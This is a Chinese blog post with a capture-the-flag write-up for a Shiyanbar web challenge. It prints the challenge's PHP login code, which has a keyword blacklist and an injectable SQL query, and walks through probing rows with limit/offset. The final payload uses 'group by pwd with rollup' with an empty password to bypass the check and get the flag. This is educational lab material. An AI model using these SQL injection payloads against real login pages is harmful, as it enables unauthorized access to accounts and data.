实验吧 - 因缺思汀的绕过

最新推荐文章于 2021-08-13 15:05:27 发布
最新推荐文章于 2021-08-13 15:05:27 发布
阅读量256 收藏
点赞数
分类专栏: sql ShiYanba
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42357070/article/details/82996356
版权

题目地址:http://www.shiyanbar.com/ctf/1940

审计网页代码,发现有一个注释:<!--source: source.txt-->
访问同目录下的source.txt
发现登陆的逻辑代码,下面就可以针对它进行绕过

 

<?php
error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
	echo '<form action="" method="post">'."<br/>";
	echo '<input name="uname" type="text"/>'."<br/>";
	echo '<input name="pwd" type="text"/>'."<br/>";
	echo '<input type="submit" />'."<br/>";
	echo '</form>'."<br/>";
	echo '<!--source: source.txt-->'."<br/>";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "水能载舟,亦可赛艇";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
	die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇";
    }
}else{
	print "一颗赛艇";
}
mysql_close($con);
?>


这里有三层限制

0X00

在第一层的filter里面就过滤了常用的SQL关键词,所以常规的SQL 注入就不行了。

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";

如果输入了filter里面的语句,网页返回“水可载舟,亦可赛艇!”

0X01

if (mysql_num_rows($query) == 1)

第二层是限制从数据库返回的数据必须是一行,在满足第一层条件的情况下可以使用 limit 的返回来确定数据库中总共有几行数据。

注意它的查询语句是 select * from interest where uname = ‘{$_POST[‘uname’]}’于是构造

1' or 1 limit 1 offset 0#
1' or 1 limit 1 offset 1#
1' or 1 limit 1 offset 3#

发现2#时返回“一颗赛艇!” 其他都是“亦可赛艇!”———–说明数据库只有两条信息

0X02

接下来想办法绕过第三层

if($key['pwd'] == $_POST['pwd'])

这里是个if判断,只要为true 就可以过,于是可以利用group by with rollup来绕过,group by with rollup会在统计后的产生一条null信息,然后在pwd里不写值,if就为true了。

payload:1' or 1 group by pwd with rollup limit 1 offset 2#

 

flag:CTF{with_rollup_interesting}

 

多崎巡礼
关注
专栏目录
一些因缺思汀的小实验1
08-03
以上实验揭示了 C++ 编程中几种常见操作的效率差异。通过对 `new` 和 `delete` 与 Buffer 的比较,我们可以了解到 Buffer 在处理大量小内存分配时的优势。同时,指针跳转和数组跳转的对比表明,在相似的内存布局中,...
实验吧-因缺思汀绕过WriteUp
焚卷觅光的博客
07-22 3079
实验吧-因缺思汀绕过WriteUp题目地址:http://www.shiyanbar.com/ctf/1940审计网页代码,发现有一个注释:<!--source: source.txt--> 访问同目录下的source.txt 发现登陆的逻辑代码,下面就可以针对它进行绕过。! 这里有三层限制0X00在第一层的filter里面就过滤了常用的SQL关键词,所以常规的SQL 注入就不行了。如
CTF-实验因缺思汀绕过
才不是小弱鸡的博客
05-07 499
web题嘛,第一步肯定是看源码。f12后发现这样一些奇怪的东东接下来肯定是打开这个文件嘛打开后就看到了php源码啦(是不是很开心!)分析一下源码可以看到这里过滤了一些sql语句(嗯,这些东西接下来不能用了)这里的意思大概是选择操作的数据库为db(数据库看不到QAQ)然后将咱们输入的uname在数据库查询uname和key,再将key和咱们输入的pwd比对,相等就打印flag。然后就要用一个注入的小...
实验因缺思汀绕过 By Assassin(with rollup统计)
Assassin
01-29 7386
这个题目还是比较新鲜的,很久没回实验吧了学到了很多的姿势~不得不说不看提示真心想不到这些,嗯。首先我们需要了解题目中php的工作原理,首先审源码得到了source.txt得到了源码,然后我们看一下源码干了什么,主要就是一个登陆认证!<?php error_reporting(0);if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
CTF中常见的php函数绕过(保持更新)
xuchen16的博客
09-20 2563
转载自:https://blog.csdn.net/csu_vc/article/details/78440021 is_numeric()用于判断是否是数字,通常配合数值判断 is_numeric(@$a["param1"])?exit:NULL; if(@$a["param1"]){ ($a["param1"]&gt;2017)?$v1=1:NULL; } //param1不能是...
实验吧-因缺思汀绕过 Writeup
baynk的博客
08-16 268
这篇过了几天才来写,原因是在第一次做的时候翻车了,去查的writeup才知道是什么回事,不过当时也只是大概看了下解法,不过最后没理解就先去学writeup相关的mysql关键字,今天再来挑战一次 过程 ...
spring-boot-demo-codegen.zip
05-22
Spring Boot 是一个流行的 Java 框架,它简化了创建独立、生产级别的基于Spring的应用程序。在本示例"spring-boot-demo-codegen.zip"中,我们聚焦于如何利用Spring Boot结合模板技术来实现代码自动化生成,这是一个...
泰山-开发规范.zip
05-22
所以本手册以 Java 开发者为中心视角,划分为编程规约、异常日志、单元测 试、安全规约、MySQL 数据库、工程结构、设计规约七个维度,再根据内容特征,细分成若干二级 子目录。另外,依据约束力强弱及故障敏感性,...
springboot_gradle.zip
05-22
这些都是Java开发中不可或缺的知识点,对于理解和实践现代Web应用的开发有着重要的指导意义。通过学习和实践这些内容,开发者能够提升项目构建效率,优化数据库操作,同时提供清晰的API文档,以及实现高效的分页查询...
ArcObjects ArcGIS 二次开发教程 C#
04-19
### ArcObjects ArcGIS 二次开发教程 C# #### 引言 随着地理信息系统(GIS)技术的发展,越来越多的应用场景需要定制化的GIS解决方案。ArcGIS作为一款功能强大的GIS平台,提供了丰富的API来支持用户进行二次开发。...
那些方法可以绕过服务器对文件内容的检测,文件上传漏洞
weixin_34739646的博客
08-13 2569
文件上传文件上传就是在一些web应用中允许用户上传图片,文本等相应文件到服务器指定的位置。而文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中,之后通过url去访问以执行代码达到攻击的目的。可以成功攻击的条件1.存放上传文件的目录要有执行脚本的权限,也就是文件能够被解析执行。2.可以通过web访问这个文件。3.知道文件上传后的路径和文件名称,有的web应用会修改上传文件的文件名称。上传...
实验吧-因缺思汀绕过
苟有恒,必有三更眠,五更起。
08-03 119
因缺思汀绕过 原题链接 http://ctf5.shiyanbar.com/web/pcat/index.php 分析 查看源码,发现提示source.txt,继续跟进,查看源码。 $con = mysql_connect("XXXXXX","XXXXXX","XXXXXX"); if (!$con){ die('Could not connec...
CTF-Web12(涉及PHP代码审计及mysql中的with rollup , limit offset的利用)
→_→
08-30 272
12.因缺思汀绕过 分析: 先查看页面源代码,收集信息: 看来这又是一道代码审计: <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '&lt...
php安全特性函数以及绕过方法
goddemon
12-08 2974
①is_numeric() 作用:检测变量是否为数字或数字字符串 绕方法:16进制会被判断为数字 %00即空格会被判断为非数字–>即直接跳过检测了 绕过方法 如 绕过方法 password=404%00–>即可绕过
因缺思汀绕过
3569
02-22 1980
阅读源码知道 保证查找内容可控就可以进行绕过 类似 union select 1,2 然后密码填写 2 题目源码 <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo ''.""; echo ''.""; echo ''.""; echo ''."
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值